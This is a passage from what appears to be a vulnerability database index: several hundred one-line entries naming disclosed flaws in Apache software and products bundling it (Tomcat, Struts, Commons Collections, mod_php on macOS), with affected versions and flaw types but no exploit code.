12351| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
12352| [101513] Apache jUDDI 3.1.2/3.1.3/3.1.4/3.1. Logout Open Redirect
12353| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
12354| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
12355| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
12356| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
12357| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
12358| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
12359| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
12360| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
12361| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
12362| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
12363| [99937] Apache Batik up to 1.8 privilege escalation
12364| [99936] Apache FOP up to 2.1 privilege escalation
12365| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
12366| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
12367| [99930] Apache Traffic Server up to 6.2.0 denial of service
12368| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
12369| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
12370| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
12371| [117569] Apache Hadoop up to 2.7.3 privilege escalation
12372| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
12373| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
12374| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
12375| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
12376| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
12377| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
12378| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
12379| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
12380| [99014] Apache Camel Jackson/JacksonXML privilege escalation
12381| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
12382| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
12383| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
12384| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
12385| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
12386| [98605] Apple macOS up to 10.12.3 Apache denial of service
12387| [98604] Apple macOS up to 10.12.3 Apache denial of service
12388| [98603] Apple macOS up to 10.12.3 Apache denial of service
12389| [98602] Apple macOS up to 10.12.3 Apache denial of service
12390| [98601] Apple macOS up to 10.12.3 Apache denial of service
12391| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
12392| [98405] Apache Hadoop up to 0.23.10 privilege escalation
12393| [98199] Apache Camel Validation XML External Entity
12394| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
12395| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
12396| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
12397| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
12398| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
12399| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
12400| [97081] Apache Tomcat HTTPS Request denial of service
12401| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
12402| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
12403| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
12404| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
12405| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
12406| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
12407| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
12408| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
12409| [95311] Apache storm UI Daemon privilege escalation
12410| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
12411| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
12412| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
12413| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
12414| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
12415| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
12416| [94540] Apache Tika 1.9 tika-server File information disclosure
12417| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
12418| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
12419| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
12420| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
12421| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
12422| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
12423| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
12424| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
12425| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
12426| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
12427| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
12428| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
12429| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
12430| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
12431| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
12432| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
12433| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
12434| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
12435| [93532] Apache Commons Collections Library Java privilege escalation
12436| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
12437| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
12438| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
12439| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
12440| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
12441| [93098] Apache Commons FileUpload privilege escalation
12442| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
12443| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
12444| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
12445| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
12446| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
12447| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
12448| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
12449| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
12450| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
12451| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
12452| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
12453| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
12454| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
12455| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
12456| [92549] Apache Tomcat on Red Hat privilege escalation
12457| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
12458| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
12459| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
12460| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
12461| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
12462| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
12463| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
12464| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
12465| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
12466| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
12467| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
12468| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
12469| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
12470| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
12471| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
12472| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
12473| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
12474| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
12475| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
12476| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
12477| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
12478| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
12479| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
12480| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
12481| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
12482| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
12483| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
12484| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
12485| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
12486| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
12487| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
12488| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
12489| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
12490| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
12491| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
12492| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
12493| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
12494| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
12495| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
12496| [90263] Apache Archiva Header denial of service
12497| [90262] Apache Archiva Deserialize privilege escalation
12498| [90261] Apache Archiva XML DTD Connection privilege escalation
12499| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
12500| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
12501| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
12502| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
12503| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
12504| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
12505| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
12506| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
12507| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
12508| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
12509| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
12510| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
12511| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
12512| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
12513| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
12514| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
12515| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
12516| [87765] Apache James Server 2.3.2 Command privilege escalation
12517| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
12518| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
12519| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
12520| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
12521| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
12522| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
12523| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
12524| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
12525| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
12526| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12527| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12528| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
12529| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
12530| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
12531| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12532| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12533| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
12534| [87172] Adobe ColdFusion up to 10 Update 18/11 Update 7/2016 Apache Commons Collections Library privilege escalation
12535| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
12536| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
12537| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
12538| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
12539| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
12540| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
12541| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
12542| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
12543| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
12544| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
12545| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
12546| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
12547| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
12548| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
12549| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
12550| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
12551| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
12552| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
12553| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
12554| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
12555| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
12556| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
12557| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
12558| [82076] Apache Ranger up to 0.5.1 privilege escalation
12559| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
12560| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
12561| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
12562| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
12563| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
12564| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
12565| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
12566| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
12567| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
12568| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
12569| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
12570| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
12571| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
12572| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
12573| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
12574| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
12575| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
12576| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
12577| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
12578| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
12579| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
12580| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
12581| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
12582| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
12583| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
12584| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
12585| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
12586| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
12587| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
12588| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
12589| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
12590| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
12591| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
12592| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
12593| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
12594| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
12595| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
12596| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
12597| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
12598| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
12599| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
12600| [79791] Cisco Products Apache Commons Collections Library privilege escalation
12601| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
12602| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
12603| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
12604| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
12605| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
12606| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
12607| [78989] Apache Ambari up to 2.1.1 Open Redirect
12608| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
12609| [78987] Apache Ambari up to 2.0.x cross site scripting
12610| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
12611| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
12612| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
12613| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12614| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12615| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12616| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12617| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12618| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
12619| [77406] Apache Flex BlazeDS AMF Message XML External Entity
12620| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
12621| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
12622| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
12623| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
12624| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
12625| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
12626| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
12627| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
12628| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
12629| [76567] Apache Struts 2.3.20 unknown vulnerability
12630| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
12631| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
12632| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
12633| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
12634| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
12635| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
12636| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
12637| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
12638| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
12639| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
12640| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
12641| [74793] Apache Tomcat File Upload denial of service
12642| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
12643| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
12644| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
12645| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
12646| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
12647| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
12648| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
12649| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
12650| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
12651| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
12652| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
12653| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
12654| [74468] Apache Batik up to 1.6 denial of service
12655| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
12656| [74371] Apache Standard Taglibs up to 1.2.0 memory corruption
12657| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
12658| [74174] Apache WSS4J up to 2.0.0 privilege escalation
12659| [74172] Apache ActiveMQ up to 5.5.0 Administration Console cross site scripting
12660| [69092] Apache Tomcat up to 6.0.42/7.0.54/8.0.8 HTTP Request Smuggling privilege escalation
12661| [73831] Apache Qpid up to 0.30 Access Restriction unknown vulnerability
12662| [73731] Apache XML Security unknown vulnerability
12663| [68660] Oracle BI Publisher 10.1.3.4.2/11.1.1.7 Apache Tomcat cross site scripting
12664| [73659] Apache CloudStack up to 4.3.0 Stack-Based unknown vulnerability
12665| [73593] Apache Traffic Server up to 5.1.0 denial of service
12666| [73511] Apache POI up to 3.10 Deadlock denial of service
12667| [73510] Apache Solr up to 4.3.0 cross site scripting
12668| [68447] Apache Subversion up to 1.7.18/1.8.10 mod_dav_svn Crash denial of service
12669| [68446] Apache Subversion up to 1.7.18/1.8.10 REPORT Request Crash denial of service
12670| [73173] Apache CloudStack Stack-Based unknown vulnerability
12671| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
12672| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
12673| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
12674| [72890] Apache Qpid 0.30 unknown vulnerability
12675| [72887] Apache Hive 0.13.0 File Permission privilege escalation
12676| [72878] Apache Cordova 3.5.0 cross site request forgery
12677| [72877] Apache Cordova 3.5.0 cross site request forgery
12678| [72876] Apache Cordova 3.5.0 cross site request forgery
12679| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
12680| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
12681| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
12682| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
12683| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12684| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
12685| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
12686| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
12687| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
12688| [71629] Apache Axis2/C spoofing
12689| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
12690| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
12691| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
12692| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
12693| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
12694| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
12695| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
12696| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
12697| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
12698| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
12699| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
12700| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
12701| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
12702| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
12703| [70809] Apache POI up to 3.11 Crash denial of service
12704| [70808] Apache POI up to 3.10 unknown vulnerability
12705| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
12706| [70749] Apache Axis up to 1.4 getCN spoofing
12707| [70701] Apache Traffic Server up to 3.3.5 denial of service
12708| [70700] Apache OFBiz up to 12.04.03 cross site scripting
12709| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
12710| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
12711| [70661] Apache Subversion up to 1.6.17 denial of service
